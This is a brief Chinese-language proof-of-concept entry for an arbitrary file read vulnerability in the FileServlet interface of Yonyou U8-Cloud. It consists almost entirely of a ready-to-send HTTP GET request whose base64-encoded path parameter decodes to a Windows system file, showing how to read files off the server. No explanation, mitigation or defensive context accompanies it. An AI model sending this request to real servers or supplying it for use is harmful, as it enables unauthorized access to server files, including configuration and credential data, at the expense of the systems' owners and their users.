用友U8-Cloud接口FileServlet存在任意文件读取漏洞

poc

GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1
Host: url